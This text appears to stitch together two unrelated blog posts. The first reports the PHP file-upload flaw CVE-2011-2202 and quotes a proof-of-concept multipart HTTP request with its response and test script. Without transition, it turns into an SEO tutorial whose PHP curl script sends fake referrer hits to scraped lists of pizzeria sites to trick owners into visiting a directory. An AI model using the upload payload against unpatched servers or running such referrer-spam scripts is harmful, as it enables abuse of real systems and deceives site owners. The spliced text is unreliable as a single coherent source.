Webmasters are advised to manually patch their PHP installations after a serious flaw allowing attackers to potentially delete files from their root directories was publicly disclosed.

The vulnerability lies in the « SAPI_POST_HANDLER_FUNC() » function in rfc1867.c and can be exploited to append forward or back slashes before the file name during an upload. This allows an attacker, for example, to delete files from the root directory or can be combined with other vulnerabilities to enhance attacks. The flaw is described as an input validation error and security bypass issue. Vulnerability research vendor Secunia rates it as « less critical. » A Polish web application developer named Krzysztof Kotowicz is credited with discovering and reporting the issue, but even though it was patched on June 12, details about the flaw have been available online since May 27.

The vulnerability, identified as CVE-2011-2202, affects PHP 5.3.6 and earlier versions. No new package has been released yet, but a patch can be grabbed from the repository and applied manually. The vulnerability  does not require authentication, and has a partial impact on system integrity. System confidentiality  are affected too.

It’s still unclear whether its access complexity should be low, as listed in an IBM XSS Force advisory, or high, as considered by the Red Hat security team.

Exploit found on pastebin.com

HTTP Request:
====
POST /file-upload-fuzz/recv_dump.php HTTP/1.0
host: blog.security.localhost
content-type: multipart/form-data; boundary=———-ThIs_Is_tHe_bouNdaRY_$
content-length: 200

————ThIs_Is_tHe_bouNdaRY_$
Content-Disposition: form-data; name= »contents »; filename= »/anything.here.slash-will-pass »;
Content-Type: text/plain

any
————ThIs_Is_tHe_bouNdaRY_$–

HTTP Response:
====
HTTP/1.1 200 OK
Date: Fri, 27 May 2011 11:35:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Length: 30
Connection: close
Content-Type: text/html

/anything.here.slash-will-pass

PHP script:
=====
if (!empty($_FILES['contents'])) { // process file upload
echo $_FILES['contents']['name'];
unlink($_FILES['contents']['tmp_name']);
}

It’s more a psychological trap for SEO admin checking stats x20 /day :)

Example

Let’s take an example, you are owner from a website directory dealing with pizzeria and you’re listing them into your website. For the example, we’ll choose « pizzeria-master-huge-directory.com » as name .
For the beginning you had created the content, scrapped manually google, searched different pizzerias in every cities you may know and you wrote 10 or 20 entries.
Now let’s think. The website is running, you got a correct position in SERP and you want to expand your visibility.

Here is the point: You want every pizzeria present on internet to come on your site, register themself and write BY HIMSELF an entry on your directory.
You would have fresh new content without doing anything.
But HOW TO DO THAT ?
Until you’re not ranking in the top #3, very few people will come and register by themselves.
Idea i had ( and i’m not the first), is to tell thoses pizzeria owner that you exist and your directory can bring them a little traffic.

Here come scripting :)
Don’t think about mail spam, it’s a waste of time. Noone cares about spams and it will be hard to get direct admin email.

Deep in SEO souls

Just remember how you were, what you did every day/week when you were a SEO beginner:

1. go to google.com
2. type analytics
3. go to http://www.google.com/analytics/
4. go to your website tab
5. go to Overview Traffic Sources
6. go to referrers
7. check WHO IS INSANE ENOUGH TO LINK YOU !

Tricks is not to get in touch with admin website by mail, it is to set up a kind of trap. Just waiti for the webmaster to see « who is the website giving him SPECIALIZED traffic ». Don’t forget your victim own: « pizzeria-jose.com » and he is about to notice that « pizzeria-master-huge-directory.com » send him a little bit traffic.

As a SEO newbie, he’ll get on « pizzeria-master-huge-directory.com » and check the website, he’ll even try to understand « how the website sent me traffic » and he may finally regiser and create an entry on directory.

See what i mean ?

Time to setup the trap

Now remember what you did at the beginning and let’s automatize this part.

1. go to google.com
2. search localized pizzeria (ex: pizzeria paris, pizzeria new york, pizzeria london)
3. go to found website and generate a hit on each of them using our pizzeria directory as referrer.

Trap is now set :D

You only have to wait for all those SEO rookies to check their analytics stats.
I didn’t measure the ROI of this trick, i think it totally depend on your business.

I just know that, this doesn’t cost a things to setup this trap and can bring you targeted webmaster who are potentially  interested on subscribing on « pizzeria-master-huge-directory.com ».

Sources

function fake_referrer($url, $proxy = false) {

	$ch = curl_init();
	//set the url, number of POST vars, POST data
	$userAgent='Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)';
	curl_setopt($ch,CURLOPT_URL,$url);
	curl_setopt($ch,CURLOPT_USERAGENT, $userAgent);
	curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch,CURLOPT_REFERER, "http://www.pizzeria-master-huge-directory.com/");

	$result = curl_exec($ch);
//	echo curl_error($ch);

	curl_close($ch);

	return $result;
}

print_r($site_list);

foreach ($site_list as $ws) {
	fake_referrer($ws);
}

I won’t give here the way to scrap google, it’s not the purpose of the topic. What you only need if to set your target list in the $site_list array.

I hope this article was helpfull. As always, if anything’s needed just ask in comment :)